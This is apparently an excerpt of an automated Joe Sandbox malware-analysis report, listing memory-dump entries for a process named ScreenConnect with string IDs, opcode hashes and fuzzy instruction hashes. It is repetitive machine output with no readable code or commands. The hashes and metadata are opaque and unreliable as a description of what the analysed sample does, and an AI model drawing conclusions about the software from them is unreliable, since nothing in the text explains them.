                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: nCuq
                                                                                                                                                                                • API String ID: 0-4247494828
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q
                                                                                                                                                                                • API String ID: 0-1007455737
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: nCuq
                                                                                                                                                                                • API String ID: 0-4247494828
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: nCuq
                                                                                                                                                                                • API String ID: 0-4247494828
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (
                                                                                                                                                                                • API String ID: 0-1334834377
                                                                                                                                                                                • Opcode ID: 11fd41522fd398b75229bdd3f2f6885b995259c161666e62da72160d4301aabb
                                                                                                                                                                                • Instruction ID: 23e5ac64a4034de57da05d9d02df00befb862124fc1ad868c22356c2c44ef3a9
                                                                                                                                                                                • Opcode Fuzzy Hash: 11fd41522fd398b75229bdd3f2f6885b995259c161666e62da72160d4301aabb
                                                                                                                                                                                • Instruction Fuzzy Hash: 4131CE31B402154F8719EB7CA990D6E7BEAEFC9650304856AD809DB389EF70ED09CBD1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (
                                                                                                                                                                                • API String ID: 0-1334834377
                                                                                                                                                                                • Opcode ID: 8ca4cb5b9fc8f7da3079f60f2afeabe571a799560e1287f34c33a2fa15af9635
                                                                                                                                                                                • Instruction ID: 79bdad736245385ce2a175eb8c798de1e11575e4d330ea6643fda543e62c9279
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ca4cb5b9fc8f7da3079f60f2afeabe571a799560e1287f34c33a2fa15af9635
                                                                                                                                                                                • Instruction Fuzzy Hash: 7731F231B403154B8709EB7DA990D6E7BEAEFC8650300856AD909DB349EF70DD09CBD0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: a9e851c7cd1ee67df7b979be20097c06ed3754f4013f92011e755c33786f472b
                                                                                                                                                                                • Instruction ID: b28c1466b14bc4ce774706d32bcb0267f7469d8941902033307e574d3217ba6c
                                                                                                                                                                                • Opcode Fuzzy Hash: a9e851c7cd1ee67df7b979be20097c06ed3754f4013f92011e755c33786f472b
                                                                                                                                                                                • Instruction Fuzzy Hash: 6431E630A053448FDB15CB74DCA97AE7FB6AF8A700F28849ED402A73A1DB752D05CB52
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: 4498f07a2226e5cb049c9924b0d12d3f661dac383e811be44f80ab8947412264
                                                                                                                                                                                • Instruction ID: c924ad4481d3584274d876d6c5a3f815c4713054b8622b5f60c251fad28ad5c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 4498f07a2226e5cb049c9924b0d12d3f661dac383e811be44f80ab8947412264
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A21E230B012049BD70C9F64CC59BBE7BB6ABC8B41F18846CE506AB291EFB19C41CB51
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: 12e8a30359e62599df0bb9bcf42129557b1618dc5230c2ce414cbb411b809ba9
                                                                                                                                                                                • Instruction ID: ec8d2f04bd62930421ea715fad462667f834cf442f9353d0b21bf0e2095bbe4f
                                                                                                                                                                                • Opcode Fuzzy Hash: 12e8a30359e62599df0bb9bcf42129557b1618dc5230c2ce414cbb411b809ba9
                                                                                                                                                                                • Instruction Fuzzy Hash: ED219630B002099FDF18DB65D9997BE77BAAF88B40F24842AD402A7390DFB45D45CB51
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q
                                                                                                                                                                                • API String ID: 0-1007455737
                                                                                                                                                                                • Opcode ID: 1945e1ecc9a336d7c1aae0408cecf2e26c465195f42c76138703bf77e9158e57
                                                                                                                                                                                • Instruction ID: a327980237cb0d7cc3b31afc2d3bcf5006195973fb17db6dd13fea73fe203856
                                                                                                                                                                                • Opcode Fuzzy Hash: 1945e1ecc9a336d7c1aae0408cecf2e26c465195f42c76138703bf77e9158e57
                                                                                                                                                                                • Instruction Fuzzy Hash: 0CE0C230288200CFDB1DCF6CD980B4137B96F54602B1644AADC08CB272E731C401CB02
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 161c6536b9c8c1ab456086608a6a86309ae56207da77935cdb055ab8aa12ac19
                                                                                                                                                                                • Instruction ID: 6037bc20e79ac76c8a7ed4a706e9105ff78b6f0c4d39883a5d28b45fcb9d3ac6
                                                                                                                                                                                • Opcode Fuzzy Hash: 161c6536b9c8c1ab456086608a6a86309ae56207da77935cdb055ab8aa12ac19
                                                                                                                                                                                • Instruction Fuzzy Hash: EAA13D74B402098FDB18DFA8D594AADBBF1EF88300F158599E406AB3A5DB75EC05CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1b98b0dfbd8d0796519400bc25d574313854c67bb3a6bc76c5138d95b9173548
                                                                                                                                                                                • Instruction ID: 917e529524d38d16cdc8ddd3532fb2e5fbab51749022cbd9b16323330284ad21
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b98b0dfbd8d0796519400bc25d574313854c67bb3a6bc76c5138d95b9173548
                                                                                                                                                                                • Instruction Fuzzy Hash: A761D335B002098FCB05DF6DD484AAEBBFAEF88650B1445AAE506DB361DB30DC46CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b1fb45741632b8bc7ef5f8ddc124c2ccdc91184f9c33834e62c518e321b324ea
                                                                                                                                                                                • Instruction ID: 78fb3195279a35bc5c7e5feb7aa3a0324912b30cf76d2d4fcaa937a3e0042500
                                                                                                                                                                                • Opcode Fuzzy Hash: b1fb45741632b8bc7ef5f8ddc124c2ccdc91184f9c33834e62c518e321b324ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 07514A34B002059FCB18DF6CD995A6AB7E6EFC831471484A9E54ACF366DB34EC068B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ff6c0741395532751b38d73e0dbd3d2b16625afb8571295b0f3ccce5362b9b8b
                                                                                                                                                                                • Instruction ID: 613f354c36052a5476dbe5544dc7cfe20c0feb5abbe0a7a06c9ae89192a1f40d
                                                                                                                                                                                • Opcode Fuzzy Hash: ff6c0741395532751b38d73e0dbd3d2b16625afb8571295b0f3ccce5362b9b8b
                                                                                                                                                                                • Instruction Fuzzy Hash: E4514B34B002059FCB18EF6CD995A6AB7E6EFC83147148469E54ACF366DF70EC068B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d48ee1fb59178e1e35ba1d6f727b2879cad957c3f0398078754d3cc83d676f7f
                                                                                                                                                                                • Instruction ID: 75de3c59f2c0ffb2afeae7c013928aaa41df19aa6915cd5b7f8af6a8fd240c58
                                                                                                                                                                                • Opcode Fuzzy Hash: d48ee1fb59178e1e35ba1d6f727b2879cad957c3f0398078754d3cc83d676f7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 3351CE34B003059FDB18EFB99990A2E7BEAEFC4740B18896AD1169B349DF309D45C781
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                • Instruction ID: c3b0e9846f935afd4814d5819f363ae36556dfa0f120d96b9849ac5bae6cda7e
                                                                                                                                                                                • Opcode Fuzzy Hash: 178efa0a1761a1361ab7c802d0b4e95f3ae4c3f47d713ce41184078d72172e64
                                                                                                                                                                                • Instruction Fuzzy Hash: 66310931A042089FDF05EBACD85199D7FF5EF89260B0485EBD454CB362DA309905CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3d88cb06b84433d0e42d8072402b655ab1aa6390e01918d02e3090239db20ce0
                                                                                                                                                                                • Instruction ID: f92fcc1c0d69265dbcfd19a79b951a0b21b7f2c91bb6bdc556c04c2bd76c263c
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d88cb06b84433d0e42d8072402b655ab1aa6390e01918d02e3090239db20ce0
                                                                                                                                                                                • Instruction Fuzzy Hash: 76310731A04249CFDF16DB78DD64A9DBFF5AF8A300F0944AAC045AB3B1CA745C02CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f7cef1b8c62ae466948f351b05a7a72d60eb8d8185eb51ddda0e4ad588b675d3
                                                                                                                                                                                • Instruction ID: bd4ec7d8b5d4895615e656a90e7096799bda62d6b0c132f3cc692598eac31fd7
                                                                                                                                                                                • Opcode Fuzzy Hash: f7cef1b8c62ae466948f351b05a7a72d60eb8d8185eb51ddda0e4ad588b675d3
                                                                                                                                                                                • Instruction Fuzzy Hash: 95317A34B106099BCB04DBACC58196EF7EAEFC9250B14856BD44AE7358DB30DC058BD1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4b52cb6915edba46b5aad143c95dbfc8999845eeba5097ef8838d0dee55a9b0c
                                                                                                                                                                                • Instruction ID: 029e9f356224acb347232c75160d2e42ade139abfbae917a768865c16dde4ec9
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b52cb6915edba46b5aad143c95dbfc8999845eeba5097ef8838d0dee55a9b0c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E312870600B058FCB34DF69D84466ABBF1EF89320F148A6CD4969B6E5D770E94ACF80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9832911eb676206cd3be79b8e696ae1262cf45860133db1df22e1fb3ecc86b79
                                                                                                                                                                                • Instruction ID: eee4729c5af4d601c203f5cc61f927da63a9bfb30067e9061415bf891bab8e8a
                                                                                                                                                                                • Opcode Fuzzy Hash: 9832911eb676206cd3be79b8e696ae1262cf45860133db1df22e1fb3ecc86b79
                                                                                                                                                                                • Instruction Fuzzy Hash: BC311670600B058FDB34DF29E88876ABBF5EF88751B144A2DD496876E1DB30E948CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2d061b7daff92219a0a768b42dcbcbc7f405ee8615802e8ff96c41ee40c6ab8b
                                                                                                                                                                                • Instruction ID: bd100cdf4431e1fa8e799543f88c9508053b8429853d2b2d1a048a6bb03ed0af
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d061b7daff92219a0a768b42dcbcbc7f405ee8615802e8ff96c41ee40c6ab8b
                                                                                                                                                                                • Instruction Fuzzy Hash: 1D317CB1D043099FCB14DFA9C444AEEBFF5EF49320F10846AD919A7341DB78A545CBA4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0848101dfb1107e1ff3cab95a7345974497a7d17a1cfabb46fcd5657ba13c97f
                                                                                                                                                                                • Instruction ID: 3a198b7b8ed0445aaffba0d7de22f0841b3c69e5809101243bdebe599d43a067
                                                                                                                                                                                • Opcode Fuzzy Hash: 0848101dfb1107e1ff3cab95a7345974497a7d17a1cfabb46fcd5657ba13c97f
                                                                                                                                                                                • Instruction Fuzzy Hash: FB311A706007018FC734DF2AC844A6ABBF5EF89354B144A69D456DB7A5DB30E946CF81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 65ec92d5f6601ffd8538952b5b28f9c662ab1476095a820ea475c062d1fa565b
                                                                                                                                                                                • Instruction ID: 67e3942da032be04c1add74dd93d04056df6bc0c07acaa6573b7cdd60f3567d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 65ec92d5f6601ffd8538952b5b28f9c662ab1476095a820ea475c062d1fa565b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B313574A04205CFCB08DFB4D988A9EBFF5FF45310B0185A6D915DB252DB30AD00CB52
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 90197ac40bd5d70b710f629d2133a1da1cf5afd349abbc37a21c6ad95306661f
                                                                                                                                                                                • Instruction ID: e1d1fded2fbc8e45590ca86a590e4d83d1454699f1740fa28e011cd6d049a986
                                                                                                                                                                                • Opcode Fuzzy Hash: 90197ac40bd5d70b710f629d2133a1da1cf5afd349abbc37a21c6ad95306661f
                                                                                                                                                                                • Instruction Fuzzy Hash: 8731EA70600B058FCB34DF69E84466ABBF5EF89320F104A6CD0969B6E5D770E94ACF81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8d5dd69c4c6c1f5e899ab5469073629e85436ae55f246068d1b5b77a679ee0e4
                                                                                                                                                                                • Instruction ID: 5540438341a935738192895603f74c5da978e88b582e6eb97fcb701e885a5e85
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d5dd69c4c6c1f5e899ab5469073629e85436ae55f246068d1b5b77a679ee0e4
                                                                                                                                                                                • Instruction Fuzzy Hash: B9218D303453449FCB09DFBCE9919AA7FE5EF8224030584EAD149CB2A6EB759D09CB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8904fdc5524fc32c3a4e38f0f2bc502ad6eccf9732121feefbba550712f4fc3a
                                                                                                                                                                                • Instruction ID: 2c33af615ea9dcb3240afe3bd101a88fb9e8c0c93ccf2d55d2dfc2b4fe688cac
                                                                                                                                                                                • Opcode Fuzzy Hash: 8904fdc5524fc32c3a4e38f0f2bc502ad6eccf9732121feefbba550712f4fc3a
                                                                                                                                                                                • Instruction Fuzzy Hash: 66313C70A007058FC734CF29D888A6BB7F5EF89724B144A2CD496DB7A5D731E906CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3888522738.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_bfd000_ScreenConnect.jbxd
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 251ff5419a5ceb8a403a1a5506a140de151dda5510ce2b87433167676b8e6bc8
                                                                                                                                                                                • Instruction ID: a10f52d34df9c2c96d69c90d84e2db22b511f6158d65e0ceeb615d9f56d82086
                                                                                                                                                                                • Opcode Fuzzy Hash: 251ff5419a5ceb8a403a1a5506a140de151dda5510ce2b87433167676b8e6bc8
                                                                                                                                                                                • Instruction Fuzzy Hash: 33214F31D14B0A9ECB01EFB8C8505EAFBB0EF9A310F01C76AD598A7111FB70A695C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f1a2f0fb65b0cd27588bcbdf388ba3c24aefec35fba5be92e3fc678216543d2e
                                                                                                                                                                                • Instruction ID: 9288cf419f118a56c10dc3ccbdd9d569c5f4fbf5f563c1de28ff11442122da9a
                                                                                                                                                                                • Opcode Fuzzy Hash: f1a2f0fb65b0cd27588bcbdf388ba3c24aefec35fba5be92e3fc678216543d2e
                                                                                                                                                                                • Instruction Fuzzy Hash: B72134B680024ADFCB10CF9AC844ADEBBF1FF88310F14C519E919A7250C339A656DFA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d4686398fb54006e9400e671d81fa4bb4f2607cd6c58798047607dd721e67fed
                                                                                                                                                                                • Instruction ID: b4c61894cad48688a968e6eb28fd6f9a44494bf875ab1240472502e81ca736a9
                                                                                                                                                                                • Opcode Fuzzy Hash: d4686398fb54006e9400e671d81fa4bb4f2607cd6c58798047607dd721e67fed
                                                                                                                                                                                • Instruction Fuzzy Hash: E6215E30200A058FD738CF69D844A9ABBF5EF84320B118A2DD497976A1DB31E95ACF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1899e40577fcf68ca8bed1cd29d963dfcbe077708f3dd7229526b507ea9fad96
                                                                                                                                                                                • Instruction ID: a3e8fd070814fb9b858efde74a2de94faa986d4760aae2ac1fe441374a538cc1
                                                                                                                                                                                • Opcode Fuzzy Hash: 1899e40577fcf68ca8bed1cd29d963dfcbe077708f3dd7229526b507ea9fad96
